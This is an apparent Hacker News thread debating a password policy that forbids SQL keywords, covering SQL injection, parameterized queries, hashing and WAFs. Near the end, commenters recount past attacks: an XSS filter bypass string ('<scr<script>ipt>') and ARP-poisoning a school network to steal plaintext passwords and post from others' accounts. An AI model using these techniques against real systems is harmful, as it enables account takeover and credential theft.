
Password may not contain: select, insert, update, delete, drop

civilized
46 replies
1d4h

I expect this will attract a lot of criticism, but I actually think it's a good idea, at least in some cases.

There are a lot of people writing bad code and bad system architectures for their organizations. There are not enough people with the competence, organizational power, and time to catch what's bad and force change in those organizations. In the US you are probably forced to do business via many such terribly coded websites, e.g. your local healthcare provider. In such cases, it might be better if we assumed the implementation might be as awful as it commonly is, and recommended mitigations based on that.

It's also easy for people to test if the website actually allows the nominally prohibited password patterns and complain to some oversight authority if so. Whereas it's not so easy to test, from the outside, whether it's really been done the right way.

It's inelegant and tragic, but in the end it might be a good idea to accept that things are often done poorly and without adequate oversight, and consider what mitigations can prevent the worst outcomes in these cases.

oliwarner
17 replies
1d3h

Your password should not go anywhere near a database.

It should be salted and hashed a few hundred thousand times, and the result compared to the salted, hashed version stored on file.

If you can't even manage that, you have no business writing software that can store credentials. And I mean that. Software security starts with acknowledging that data is toxic and will bankrupt you if you refuse to respect it.
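
(A rough sketch of that flow in Python, just to make it concrete; the function names, the PBKDF2 choice, and the iteration count are illustrative assumptions, not a specific recommendation.)

    import hashlib
    import hmac
    import os

    ITERATIONS = 600_000  # "a few hundred thousand" rounds; tune to your hardware

    def hash_password(password: str) -> tuple[bytes, bytes]:
        # Return (salt, digest) for storage; the plaintext is never persisted.
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return salt, digest

    def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
        # Re-hash the submitted password and compare in constant time.
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
        return hmac.compare_digest(candidate, stored_digest)

Only the salt and the digest ever reach storage, so it makes no difference which SQL keywords the password happens to contain.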

civilized
11 replies
1d3h

Many people in positions of great responsibility don't do what they should. What do we do about that?

oliwarner
9 replies
1d2h

I wouldn't be telling anyone to implement crappy password policies as a workaround.

I'd tell them to do it properly or not at all, and remind them that in many jurisdictions, knowingly implementing poor data controls earns you some actionable liability. PII is no joke.

This isn't controversial when you're telling people you can't do your own gas work without certification, or electrics without experience. It's okay to demand competence.

civilized
7 replies
1d2h

What you're recommending is the status quo. The status quo has led to me receiving regular letters informing me of massive security breaches where all my PII is disclosed and I have no recourse of any kind, other than possibly spending my life fighting a giant company in a class action lawsuit when I have no time or skill set to do so.

oliwarner
6 replies
1d1h

What I'm recommending is just part of the bare minimum security requirement for an authentication system. SQL parameterisation, transport encryption, input validation (and more) are all as important.

Stopping SQL keywords is a distraction dressed up like security. It's harmful.

civilized
5 replies
1d

Stopping SQL keywords is a distraction dressed up like security. It's harmful.

We are talking about how to mitigate harm from people who are already doing the wrong thing. Saying that this distracts from doing the right thing misses the point. They are already doing the wrong thing. You saying they should not do the wrong thing does not stop them from doing the wrong thing. Once again, your proposal is the failing status quo.

oliwarner
4 replies
22h48m

I'm really trying to meet you halfway here but I can't imagine a scenario where I had such low confidence in a third party application that I'd wrap it in input-filtering cotton wool and feel like that was safe enough.

A project that both stores plaintext passwords and fails to use parametrisation (something that's been standard practice for over two decades) is untrustable. It's an untenable liability.

Maybe I'm wrong. Could you explain when you think this would be acceptable?

civilized
2 replies
22h36m

It's not that I think it's acceptable. I'm thinking about how to reduce the harm of people doing unacceptable things that we can't stop them from doing. I would be very transparent about this. I would say this is harm reduction for people who are doing the wrong thing and is a waste of everyone else's time, but we have to do it anyway because software engineering has failed to govern itself as a profession and the government has failed to hold it accountable for its disasters.

The key thing is that it's both easy to test and would stop many attacks. Anyone can check whether the password field will take these forbidden keywords and patterns.

No question it's a pathetic thing to have to resort to, but pathetic is where things are at right now.

oliwarner
0 replies
9h11m

If they're storing raw data without parameters, you can't have any confidence they do that with every other SQL query. You'd have to block every SQL token from every input.

Imagining we're happy to sacrifice these words to the gods of security theatre, at what layer are you suggesting this goes? Browser level just means hackers can make raw requests. The HTTPD could block it, like an overzealous WAF, but that still needs implementing. Service providers shouldn't be able to see this stuff because of transport layer security.

There's no sensible way to make this make sense.

I do agree that a lot of entities are not adequately prosecuted for their incompetent data handling but fixing that seems far more realistic than banning the word "drop", everywhere.

lmm
0 replies
19h39m

Does it really reduce harm? Bypassing something like this should be, like, one checkbox in metasploit. It's like requiring all walls to be wallpapered to make sure no-one spots any cracks in the walls.

pixl97
0 replies
3h5m

https://en.wikipedia.org/wiki/Swiss_cheese_model

Most software you use is untrustable. You get a binary and you pray the vendor isn't an idiot. Even if you watch all the SQL commands it runs in normal operation, you can't be sure an attacker cannot send some operation you don't know about and run an arbitrary SQL command.

cbsmith
0 replies
21h50m

It's okay to demand competence, but I wouldn't expect competence to materialize overnight.

x0x0
0 replies
22h54m

Do what we've successfully done for hundreds of years: Fine and potentially prosecute them. Stop pretending software engineers are special snowflakes, and apply the same standards we use for bridges, roads, etc. None of those are perfect, but they do manage to do things like stop using known-bad materials, which is broadly equivalent to allowing script injection via password fields.

cbsmith
4 replies
21h51m

Your password should not go anywhere near a database.

It should be salted and hashed a few hundred thousand times and that compared to the salted, hashed version stored on file.

If you can't even manage that, you have no business writing software that can store credentials

That's misunderstanding the nature of the vulnerability. It's not about where the password is stored, but where it is entered. Before it can be salted & hashed, there's software that has to decide where the password input starts and ends. If it gets that wrong, that's how you get the vulnerability.

It's not even clear that there is a vulnerability problem here, though there is obviously a usability/UI problem. It could very well be that having those words in your password doesn't compromise security anywhere, but some systems might reject the password before even attempting to authenticate with it.

oliwarner
1 replies
21h32m

It might be a measure to avoid triggering an overenthusiastic WAF, but these are all SQL tokens and keywords. It seems far more likely that they've blocked them in a desperate effort to catch injection attacks.

There might not be an actual attack vector; they might block these words in all inputs. It just smells like incompetence.

pixl97
0 replies
3h54m

WAFs commonly block SQL keywords to prevent SQL injection, so it still holds that the WAF could do it.

deathanatos
0 replies
15h37m

That's misunderstanding the nature of the vulnerability.

No, they're 100% correct. If the password is properly stored, there's no possibility of injection, because what gets sent to the database is something like a hex string, or just a bytestring, depending on representation.

It's not about where the password is stored, but where it is entered. Before it can be salted & hashed, there's software that has to decide where the password input starts and ends. If it gets that wrong, that's how you get the vulnerability.

???

Where it is entered looks like this:

  <input type="password" name="password">
… the actual text of the password makes no appearances, ever.

Whatever code you're using to generate HTML/DOM nodes, or SQL queries, should be parameterized and automatically escaping all inputs. If it isn't, that's the security issue, and trying to kludge around it with idiotic restrictions won't work. (Other commenters have already alluded to the problems with the OP's attempt.)

But even then, a password should never hit either of those interfaces: there's no reason to render it into the DOM, or into SQL.

(There are some other comments about this might be to help users work around failures in a WAF. That could be, but it's orthogonal.)

8note
0 replies
15h39m

but where it is entered.

Hmm. This strongly reminds me of GPT prompt injection. I guess that's why they're both called injection attacks.

wongarsu
9 replies
1d3h

If an organization has such a password policy, it can be interpreted as the person in charge of the policy thinking their organization doesn't have enough people with the competence and organizational power to prevent SQL injection vulnerabilities. Which would reflect poorly on any institution, but especially a university (which should be a bastion of people with competence and organizational power).

As for common password advice, my take on your argument would be that we should all be using these keywords in our passwords to quickly surface these bugs, lest they be hidden and only used by attackers.

civilized
3 replies
1d3h

Counterpoint - however pathetic it may be, it's better that they publicly owned up to their lack of confidence in this way. The question is, what do we do about it once we see something like that?

wkat4242
2 replies
22h57m

The question is, what do we do about it once we see something like that?

Run away and stay as far away from their products and services as possible.

danesparza
1 replies
21h48m

It's a university

wkat4242
0 replies
21h4m

Ok don't go there to study CS :)

patrakov
1 replies
1d3h

It can be interpreted as you suggest, but does not necessarily come from the person in charge. It might mean that auditors forced the installation of a WAF because of $REGULATIONS (irrespective of the actual code quality) and refused to allow weakening the rules for password fields.

EDIT: as they don't actually check for all the banned strings, the "auditor + mandatory misconfigured WAF" hypothesis expressed above is not valid in this case. But let it stay as an otherwise-plausible explanation, or maybe something that was valid in the past.

wongarsu
0 replies
1d3h

The WAF hypothesis still holds if you assume the password change page is governed by the same WAF. The WAF would reject any new password it finds offensive, and the "rule" about not using certain SQL keywords just matches people's fuzzy understanding of why these passwords are rejected. It was probably even true, a couple WAF rule updates ago.

SoftTalker
1 replies
23h5m

especially a university (which should be a bastion of people with competence and organizational power)

Generally the opposite. University staff positions pay pretty poorly compared to what the most competent people can earn elsewhere.

There are some bright staff people at universities who are there for other reasons besides the pay, but the competence of an average university staff software developer is not great.

This is also why over the past two decades universities have trended to SaaS subscriptions rather than building software in-house.

cbsmith
0 replies
22h0m

Yeah, there's very much a "cobbler's children have the worst shoes" aspect of this that some people don't get.

mkl
0 replies
21h55m

especially a university (which should be a bastion of people with competence and organizational power).

Those people are not the ones running the IT systems. Even the software engineering and information systems departments have no say. IME university IT are understaffed, outsource a lot (often without a choice), and often have to follow decrees from higher management that don't seem to have been thought through.

jchw
7 replies
1d2h

I disagree. It may seem good on paper, but it gives you too much of a false sense of security. Security measures like this often seem to work, but they are papering over a deeper problem. Usually this is being done because user input is not being handled carefully, and if so, the assumption that blocking some keywords "defangs" potential exploits is usually easy to prove false. Consider the case of eBay and JSFuck[1].

I dislike the mentality that leads to this; WAFs, lazy pentesting and compliance checkboxes have created a substantial body of absolute bullshit security theater and I have absolutely zero doubt that this has convinced companies it's "safe" to put insanely poorly written software partially out on the open internet and that they've "done their due diligence" so to speak. And then I get a letter in the mail apologizing that my most confidential information has yet again been leaked by some company I barely or didn't have any real choice to give my data to. I'm sure they all care deeply about my data and that's why it was stolen using decades-old Java serialization library vulnerabilities.

[1]: https://blog.checkpoint.com/research/ebay-platform-exposed-t...

civilized
6 replies
1d

A lot of critical responses here are saying "this distracts from getting people to do the right thing". I'm open to that, but what is the plan for forcing organizations that are doing the wrong thing to do the right thing? We're talking about businesses that mismanage the sensitive data of millions of people. "They should be doing things right" doesn't seem like an adequate response to this situation.

jchw
4 replies
23h4m

Correct, we should be legally enforcing that they do the right thing, with legislation that has actual fangs, for companies like Equifax. It should be a potential bankruptcy event when you leak most of America's social security numbers through sheer incompetence.

The problem is that WAF-style security-theater is being enshrined as the industry standard instead, which means that we're just going to get more of these problems instead of less. In other words, a half-measure like this doesn't just distract from doing the right thing, it's actually literally useless for any real security, and instead it's more likely to allow serious security issues to go unnoticed for a much longer period of time.

jstarfish
2 replies
18h40m

legislation that has actual fangs, for companies like Equifax. It should be a potential bankruptcy event when you leak most of America's social security numbers

Immutable identifiers should never have this much weight. When your encryption key is compromised, you roll it. When your SSN is leaked, you're doing damage control for the rest of your life. This problem did not begin with Equifax.

It's a 9-digit number that encoded most people's birth region in it until a little over a decade ago, and it gets asked for by all sorts of randos having anything to do with finance. The problem here is that something so readily shared, easily compromised, and impossible to change has this much weight in our identification protocols.

jchw
0 replies
3h7m

I truly feel that is neither here nor there. As long as we don't fix what's wrong with Equifax, we can trust absolutely nothing to stay private with them or similar entities for any substantial amount of time. Therefore, we actually need to fix this problem anyways. Having just one of these fixed will not solve much.

I am receiving approximately one parcel per month informing me of a new data breach.

bruce511
0 replies
18h24m

You are not wrong, but I'd argue that mutable ID methods would be worse.

Ok, context and perspective will matter a lot here. If you are wanting to hide from authority then mutable id sounds good. If you are wanting to "know the history" of a person then mutable is bad.

In our social contract the "inability" to change id is baked into the way we behave, and the consequences for bad behavior.

Equally there are lots of good reasons to be able to get a quick history of say a prospective employee, loan recipient, tennant, supplier, customer, and so on.

If I can apply for a new Social Security number every month/year then that number does become useless as a form of id.

But it would then just need to be replaced with something else. Too much of what we do is predicated on our historical behavior. Having a 12-month limit on identity would break, well, just about any kind of contract.

And in most contract situations you most definitely want to know "who" you are contracting with.

civilized
0 replies
22h40m

I agree with you about security theater. The only reason I'm favorable to this approach is because it seems to provide accountable harm reduction in this case. It would stop many typical attacks while being very easy for any random government bureaucrat to test compliance with.

redeeman
0 replies
17h18m

I'm open to that, but what is the plan for forcing organizations that are doing the wrong thing to do the right thing?

i'd say figure out how bad what they did is. Not hashing and building sql strings like that: go to jail for a long time.

Gross carelessness with private data: go to jail for a very long time.

About the same time as if you purposely published the data, or purposely dropped a table, because that's about what you did. If you don't have the competence, you have no business writing such a system. If you don't know how to calculate a bridge that won't collapse, or don't know how to follow the plans and build it properly, you have no business being there.

ipython
4 replies
1d3h

But why would you ever send a plaintext password into a sql query?

petee
1 replies
1d3h

Since being clever is often a footgun, I'll admit to one idea I had years ago; I never really gave it the smell test, and it only existed for a personal project. But if one person thought of it, others may have as well.

I was learning to write sqlite C functions for fun, and thought since storing plain passwords has been such an issue, why not offload the responsibility from the programmer and let the db handle it fully -- consume plaintext, salt, hash, etc, and could transparently upgrade algorithms when necessary.

Luckily I've learned enough to recognize that my skillset is not of the level necessary to fully evaluate the risks. Today the idea makes me feel uncomfortable.

paulmd
0 replies
16h22m

one general problem with this (and also audit logging) is making sure that such changes can't be rolled back. I think the consensus the last time I looked at it was to do it in a separate connection or batched at the end of the main transaction. but audit logging is just such a tremendous pain in general and everyone's got their own specific requirements.

I think in general you would not want to do this in the database anyway (definitely not unless it's sharded, and not really even then). You are taking that hashing load off your application servers and moving it inside the DB, after all. When your DB is out of CPU, it's out; they're tough to scale. And in SQLite you are holding the DB write lock for longer, which serializes every other thread that needs to write. That's also true of holding connections/resources in traditional DBs. It's notionally fine for toy problems and you can probably do "clever" shit like sharding uuids across multiple files by hash to scale a bit further. But increasingly, even as someone who likes the idea of a "richer" interface to RDBMS, and doesn't mind writing SQL functions/triggers/views where it makes sense, I think the database really just is not the place for unnecessary gizmos, on performance grounds either. Don't put hashing in your DB.

civilized
0 replies
1d3h

Because you are lazy, irresponsible, and/or incompetent.

AndroTux
0 replies
1d3h

Or anywhere else except a hash function for that matter?

_heimdall
1 replies
1d3h

What is the attack vector this protects against though?

If the authentication flow is doing anything other than salting/hashing the password and then throwing away the original plaintext password, the entire system really shouldn't be used at all.

civilized
0 replies
1d3h

It (partially) protects against the attack vector in which the system was badly coded and simply does not do what everyone with basic competency insists all systems must do.

I strongly suspect that this is the most common attack vector in cybersecurity.

zzyzxd
0 replies
1d

I find this to be a common defense-in-depth trap. A lot of engineering effort gets thrown at the wrong layer, when the problem can be much more efficiently solved on another layer.

It leaves the whole organization working in fear -- when you have to worry about the system inserting the password in plaintext into a database table, there are also a million other terrible things that can go wrong in this system, like what if your DBA copy-pastes a SQL snippet from Stack Overflow? There's just endless work.

If your org has incompetent engineers, then maybe just don't let them implement their own authentication system. Use popular open source frameworks and/or buy a commercial product.

vldr
0 replies
9h49m

jknoepfler
0 replies
17h5m

An unhashed, unsalted password should literally never touch a database.

Which is to say this kind of sanitization on passwords is meaningless if the barest of security standards are in place.

Retr0id
30 replies
1d4h

Optimistically, perhaps this requirement stems from an overzealous WAF

berkes
14 replies
1d4h

That, or some poorly architected "framework" or toolkit.

Others in the comments see this as "proof" that the application has poor security. I don't think we can draw that conclusion. We can, however, draw the conclusion that some part of the stack is poorly implemented.

junon
12 replies
1d4h

I mean, this is a gross misunderstanding of how user input makes its way into a database safely. If you're putting out error messages like this it's a giant red flag.

mikkom
7 replies
1d4h

And on top of that, passwords should NEVER be stored in the database

eddd-ddde
4 replies
1d2h

It's normal for them to make it to an executed SQL query.

duskwuff
3 replies
22h50m

No, it isn't.

If a user's password leaves the web application in any form other than a hash, something nonstandard and probably bad is going on.

Wingy
2 replies
20h46m

Hashing can be done in a stored procedure. Maybe the organization decided that it's better for the DBA to handle hashing. Nonstandard maybe but not necessarily bad.

duskwuff
1 replies
20h27m

Hashing can be done in a stored procedure. [...] Nonstandard maybe but not necessarily bad.

No, it's unambiguously bad. You're transmitting a cleartext password to a system which doesn't have a business need to know it, and which wasn't designed to process secret data. There's a substantial risk that the database may leak that data in some unexpected way, e.g. by logging it when an error occurs or by showing the parameter in a process list. Worse, a stored procedure can potentially be covertly modified to store or exfiltrate the password while hashing it.

junon
0 replies
19h46m

To be clear, this only improves security if the user reuses passwords.

junon
1 replies
1d4h

Well, not in plaintext.

klyrs
0 replies
1d

That's why you hash the password with an SQL built-in hash function. For security! But the password is still in plaintext inside the query so you can retrieve it from the logs for... security?

(I joke, but 20 years younger me, self-teaching php and security etc? Who knows what she'd think of this)

graemep
3 replies
1d4h

It is also very common not to do things right. https://www.bbc.com/future/article/20160325-the-names-that-b...

That article is a few years old now and things should have got better, but even by 2016 everyone should have known properly sanitising inputs was critical for a decade or two.

junon
2 replies
1d4h

Right but that's not really an excuse not to do them right.

pixl97
1 replies
2h55m

You're working the premise backwards...

One of the systems is already wrong. The excuse not to do the system right is the monetary cost of fixing the broken system.

Out of all the excuses in the world, money wins.

junon
0 replies
2h0m

EDIT: responded to the wrong comment, apologies.

I really don't understand your point. If I hash on the browser the hash is still being sent to the server. A MitM or sniffing attack can just send the hash and log in. It doesn't actually protect the user at all unless they're re-using the password elsewhere. This also assumes that you're using a seeded hash of some sort, or a multi-round hasher with settings unique to every other website. Otherwise you're still going to run into stuffing and collisions.

So for sites where the plaintext password is sensitive (password managers etc) that's important. For most sites, it's not inherently wrong not to hash passwords in the browser, though it does protect against password reuse.

I'm not saying you're wrong, I just don't think you're accurately portraying the problem you're fixing.

cookiengineer
0 replies
21h37m

You can just try out some || concatenated strings and an OR statement to verify the lack of security. It's not like it's a secret how to do SQL injections in 2024.

Bypassing this kind of filter is literally the second picoCTF SQL injection level, which is intended for high school STEM students.

turminal
9 replies
1d4h

That would imply WAF gets to see unhashed passwords, so not good at all.

hiatus
5 replies
1d4h

How would a WAF do its job if it can't see the request payload?

wongarsu
4 replies
1d3h

There are various schemes where the password is salted, hashed or prehashed on the client side, with varying effectiveness. They have never been really popular, and the advent of ubiquitous https probably made them even less common, but they do exist. They do help protect you from your own WAF though.

d-z-m
3 replies
1d3h

can you elaborate on this? Or link something that does? My intuition is that whatever gets sent over the wire is effectively the password. Not sure how the server could validate some rolling hash of the password (based on, like, a timestamp or something) without having to store the pre-image (i.e. the raw password).

wongarsu
0 replies
1d3h

Yes, that's the common counter argument. Your hash has now just become the password, and no amount of clever salting really solves that.

It still prevents the server (and any proxies, MitM attackers, etc) from seeing the plain-text password, which can help protect the user if they reused the password somewhere else. That assumes the client wasn't also compromised, which is a shaky assumption in web applications but maybe a valid one for native apps and desktop applications.

The other imho valid idea is that you can run a key derivation function client-side (e.g. salted with the user-name), in addition to running your normal best-practice setup server side. This can allow you to run more expensive key derivation which provides more protection if your database is leaked, while also making dictionary attacks on your authentication endpoints less viable.
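
(A sketch of that two-layer idea, written in Python for brevity even though the first half would really be JavaScript running in the browser; the iteration counts and the username-as-salt choice are assumptions for illustration, not a vetted scheme.)

    import hashlib
    import os

    def client_side_prehash(username: str, password: str) -> str:
        # Expensive KDF in the client, salted with the username, so the server
        # (and its WAF/proxies) never see the raw password.
        digest = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), username.lower().encode(), 1_000_000
        )
        return digest.hex()

    def server_side_store(prehash: str) -> tuple[bytes, bytes]:
        # The server treats the prehash as "the password" and still applies its
        # own salted hash before storage, as usual.
        salt = os.urandom(16)
        stored = hashlib.pbkdf2_hmac("sha256", prehash.encode(), salt, 100_000)
        return salt, stored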

liversage
0 replies
20h49m

The SRP Authentication and Key Exchange System does not send the password from the client to the server. This scheme is supposedly used by Blizzard when authenticating users in some of their online games.

https://www.rfc-editor.org/rfc/rfc2945

https://security.stackexchange.com/questions/18461/how-secur...

aidenn0
0 replies
15h25m

If your password is 123456, then client-side hashing will make this less obvious. If the site is compromised in a way that reveals passwords, then it will not trivially work on other sites that use your password. In addition, stronger total hashing can be used: if your server can do M hashes per second and your client can do N hashes per second, the total number of hashes allowed for a one-second login is (M/$NUMBER_OF_CONCURRENT_LOGINS)+N, which is strictly larger than (M/$NUMBER_OF_CONCURRENT_LOGINS).

SRP[1] is an even better improvement, where an eavesdropper cannot authenticate as you; there is a challenge-response to login.

1: https://en.wikipedia.org/wiki/Secure_Remote_Password_protoco...

wkat4242
0 replies
22h54m

These are SQL commands. The WAF would see the password unless you pre-hash it on the client side in JavaScript (not a bad idea). But the database really should never ever see the plaintext password. If it does you're doing a lot more wrong than just being open to SQL injection.

rassimmoc
0 replies
1d3h

Why would the WAF see hashed passwords? Passwords are hashed by the application, so that happens after the WAF does its job and hands the request over to the app.

jesprenj
0 replies
1d3h

WAF always sees unhashed passwords -- passwords are sent TLS encrypted in a POST body (unhashed) and are hashed by the server software -- and that's regardless of the password policy.

g4zj
4 replies
1d4h

What does WAF stand for?

travoc
0 replies
1d3h

One of the things that devs can blame when our app doesn’t work in production.

thedougd
0 replies
1d4h

Web application firewall

It’s a reverse proxy that inspects requests for bad stuff like sql injection.

dharmab
0 replies
1d4h

Web Application Firewall

amiljkovic
0 replies
1d4h

Web Application Firewall

mysterydip
28 replies
1d4h

Obligatory meme-y "tell me you're not sanitizing input without telling me". Also not storing hashes of passwords, because then it wouldn't matter what the input is.

tester756
13 replies
1d4h

Actually they do sanitization by blacklisting

"Blacklist sanitizing cleans the input by removing unwelcomed characters such as line breaks, extra white spaces, tabs, &, and tags."

But still, this is not the way; input sanitization is bullshit.

Using query parameters, which insert the raw input into the already-built abstract syntax tree of the SQL query, is the correct solution, since SQL injection is about affecting the tree's composition.
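
(For example, with Python's built-in sqlite3 driver; the table and values are made up, and in a real authentication flow the password would already be hashed long before it got anywhere near a query.)

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")

    name = "alice'; DROP TABLE users; --"  # hostile-looking input
    pw_hash = "deadbeef"                   # hashed elsewhere

    # The ? placeholders are bound after the statement is parsed, so the input
    # can only ever be a value; it cannot change the shape of the query.
    conn.execute("INSERT INTO users (name, pw_hash) VALUES (?, ?)", (name, pw_hash))

    row = conn.execute("SELECT pw_hash FROM users WHERE name = ?", (name,)).fetchone()
    print(row)  # ('deadbeef',)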

hobs
6 replies
1d4h

You don't even have to do that, just escape single quotes and you've defeated everything but homomorphic attacks as far as I can tell.

dylan604
3 replies
1d3h

That’s a comment that makes me think someone read a blog 15 years ago, and never kept up with modern ways of doing things.

hobs
2 replies
1d

Cool - but neither of your comments addressed that I am still correct, afaict. If you care about query plans and such, parameterization is important, but not getting injected is a different problem.

dylan604
1 replies
23h40m

look, if you still want to live like it's 1999, then sure, go ahead and wrap your params in quotes like you think you can. just don't come crying to the rest of us that have more than once provided you with better solutions when you get attacked. i mean, even using the old style escape methods would be better than your appending of quotes idea.

hobs
0 replies
4h15m

I didn't say I don't use parameterization, and I still haven't heard what the difference is between the old style escape methods and the quotes I mentioned, just you being salty :)

tester756
1 replies
1d4h

Why use unreliable solutions that rely on various assumptions that may change in the future, and on you not forgetting even one case where they wouldn't work,

when you can use an approach which fundamentally prevents SQL injection?

hobs
0 replies
1d

I didn't say you should, I am just noting that there's no complexity in the solution required, it's simple and yet still many people don't do it.

skottk
2 replies
1d4h

Parameterized SQL is your friend here.

mysterydip
1 replies
1d4h

Yeah, that's what's mapped in my head to "sanitizing input" in these cases, as it's the correct way to handle them. I should've unrolled my brain shortcut for the discussion.

dylan604
0 replies
1d3h

Before Parameterized SQL was a thing, sanitizing was the thing. There’s a lot of escape_string() type of methods out there.

reeeeaway
2 replies
1d3h

Looking at the postgres JDBC source, it sanitizes parameters when prepared statements and parameterization are used. Different implementations may do different things here though.

tester756
1 replies
1d3h

Could you describe it conceptually how they do it?

reeeeaway
0 replies
1d2h

The method doAppendEscapeLiteral (Line 66) is a good example; https://github.com/pgjdbc/pgjdbc/blob/master/pgjdbc/src/main...

I didn’t take notes all the way down, but at the end of the day this method is invoked when a prepared statement's parameters are being bound

ajross
8 replies
1d4h

Also not storing hashes of passwords, because then it wouldn't matter what the input is.

That only tells you they don't hash the passwords in the client. Likely the protection ("protection") is for the input validation layer, not the password backend itself.

sevensevennine
2 replies
1d4h

Don't hash the password on the client. That just changes the password to the hash of the password.

Parameterize the SQL on the server instead of concatenating strings.

hn_acker
1 replies
1d2h

If you're using a third-party reverse proxy, then the third party will have access to the user's password. What's the simplest way to prevent the third-party from knowing the password? Would adding an encryption layer between the user and the actual website owner be both feasible and sufficient for the average website owner?

Falmarri
0 replies
23h24m

Don't use reverse proxies you don't trust

TacticalCoder
2 replies
1d4h

Is it a slow sunday for me or... If you hash the password on the client and send the hash then hash is the password. And if you then have, for example, a DB leak with username and hashes, you don't need the password anyway because you can just send the hash and log in? (but then it's sunday and I need more coffee so I may be wrong)

gvx
0 replies
1d3h

That is correct.

The client sends the encrypted (via HTTPS) but not hashed password to the server, both for changing your password and checking your password. So the server receives the password in plaintext but shouldn't store it.

Whatever the client sends to the server, an attacker can send too.

andy81
0 replies
20h52m

You're not the first to come up with that exploit-

https://en.wikipedia.org/wiki/Pass_the_hash

howrar
1 replies
1d3h

How could the validation layer be affected by the presence of these substrings?

ajross
0 replies
1d2h

GuB-42
4 replies
1d4h

Thinking about it, it can also be that the input is sanitized a little too much.

Imagine the user uses "select_mypassword" as a password. The sanitizer kicks in and silently mangles your password, resulting in a different password being stored than the one you entered, effectively locking you out. Or maybe it just fails with an obscure error because some overzealous countermeasure triggered. I wonder what using the EICAR file as a password would do, btw.

Also, while the password may be stored properly (hashed), the password still transits in plaintext before it is stored or verified. So even with hashing, you can still be vulnerable to injection.

MadnessASAP
3 replies
1d3h

Presumably you would apply the same sanitizer at login time to whatever password the user enters. If the input is the same and the transform is the same then the output will be the same.

Hopefully you don't actually have to do any of this because your backend wasn't written by monkeys on typewriters.

patrakov
1 replies
1d3h

This relies on a false assumption that the sanitizer is static.

MadnessASAP
0 replies
1d2h

If we're to continue with this thought experiment in doing the dumb thing. Clearly you would version your sanitizer and store which version you used when saving the password. That way you can ensure the same version is used against future user inputs.

GuB-42
0 replies
1d3h

What may happen is that every step is siloed in some way and every team assumes the others are monkeys on typewriters. From a security perspective, that is not necessarily a bad thing, but it can make the user experience terrible.

For example, I may write some piece of software that refuses to write files with spaces in them, because I suspect that later on, some shell script will process them and it is very common for poorly written shell scripts to break on spaces in file names. But it may turn out that, unexpectedly, the people who write the back end are competent and deal with spaces just fine. But on their side they may expect me to be the monkey and say, avoid replying with Unicode characters, assuming my code will break if it gets something that is not an ASCII printable character.

So in the end, the user will have neither spaces in file names nor proper Unicode support, even though the software wouldn't have any problem with that if the two teams properly communicated and didn't think of each other as monkeys.

matsemann
26 replies
1d3h

Can not contain "script".

I hacked a big social platform in my early teens (Nettby.no), since they just did a single-pass removal of all banned words, including <script>. I instead wrote <scr<script>ipt> in my profile bio, and after their removal I had a valid html tag injected into the webpage and full control of anyone visiting my page.
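
(Roughly what happens, reconstructed as a tiny Python snippet; the actual filter was of course not this code, but any single-pass removal behaves the same way.)

    bio = "<scr<script>ipt>alert('hi')</script>"

    # Single-pass removal of the banned tag: the two halves it leaves behind
    # reassemble into exactly the tag it was trying to remove.
    filtered = bio.replace("<script>", "")
    print(filtered)  # <script>alert('hi')</script>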

mtlmtlmtlmtl
10 replies
20h6m

Hah, I hacked Nettby in school too, good days.

Nettby had no HTTPS, so I did an ARP poisoning MITM and stole everybody's passwords. Then I posted random nonsense from people's accounts and watched the chaos ensue(did no snooping, even 14yo me had a semblance of ethics somehow).

coolThingsFirst
9 replies
19h49m

Eli5 this attack pls

cqqxo4zV46cp
4 replies
19h19m

It should also be said that HTTPS was seldom used outside of especially sensitive applications until ~2010, when someone packaged an HTTP MITM attack up into a handy Firefox extension. I think that Facebook used HTTPS for the actual login credential exchange, and then bounced back to HTTP, which meant that the session cookie/s were still MITMable.

It’s insane how long it took to see widespread HTTPS adoption.

nicolas_t
1 replies
14h22m

I remember that back then a lot of apps had convoluted code to do this https-only-at-login dance, all in the name of performance (because https was slower, though really it was a premature optimization). Switching to https only actually mostly helped simplify codebases...

singingfish
0 replies
10h39m

yeah, a colleague and I ripped out all of the http / https dance out of a 20 year old code base a little while back. It simplified things a lot.

roughly
0 replies
18h51m

Yes! Firesheep was the extension, and I think the combination of that and LetsEncrypt (which was in part a reaction to Firesheep) were the reason the web went from almost entirely decrypted by default to almost entirely encrypted by default in a matter of months. The capabilities had been there for years, but Firesheep made session hijacking a literal one-click affair and vividly highlighted the danger of unencrypted web traffic - it’s maybe the most impactful bit of white-hat hackery of all time.

nijave
0 replies
17h20m

Iirc Google said they'd start penalizing non https sites in search results and browser makers added much more aggressive warnings to http pages.

It caused quite a commotion among small site operators.

jcul
3 replies
19h27m

I've no idea what nettby is.

But ARP is how computers figure out what IP address is associated with a hardware / ethernet address, so they know what ethernet address to use for sending packets to a specific IP.

ARP poisoning means you flood the network with fake ARP packets saying your ethernet address has the gateway IP or whatever IP. So then the other devices will forward packets to your machine instead of the intended destination.

As nettby didn't use HTTPS it would then be trivial to capture / read the packets and figure out everyone's passwords. I.e. the messages would be plain text, unencrypted.

Not exactly Eli5, but hope it helps.

coolThingsFirst
1 replies
18h15m

Yes but isn't this possible only on LANs?

mtlmtlmtlmtl
0 replies
17h56m

Correct. I did this at school. It was early days of students being allowed laptops in class.

We weren't actually allowed internet, but the school had an extremely basic wifi network that was WEP encrypted... So naturally I broke out Aircrack-ng and ameliorated that situation. And suddenly everyone was procrastinating on nettby in class.

mtlmtlmtlmtl
0 replies
19h2m

This is pretty much the reply I'd write, so I'll just add my endorsement.

Couple more tidbits of information:

  Nettby was a Norwegian Myspace clone and it was all the rage back when I was in middle school (around 2007-2009 or thereabouts).
  ARP stands for Address Resolution Protocol.
  ARP has no security built in by default. This combined with the plaintext passwords made the attack trivial.

counterpartyrsk
5 replies
19h50m

Interesting, can you explain 'full control'?

crazygringo
4 replies
19h22m

You can run any JavaScript.

So you can show a popup saying the user needs to log in again, and then log their credentials on your own server instead.

paledot
3 replies
18h46m

Or exfiltrate their session cookie, or post spam/phishing links on their behalf...

sillysaurusx
2 replies
16h6m

Session cookies are generally not available to javascript. The latter is true though.

None4U
1 replies
15h42m

Perhaps HttpOnly wasn't as prevalent back then?

matsemann
0 replies
9h48m

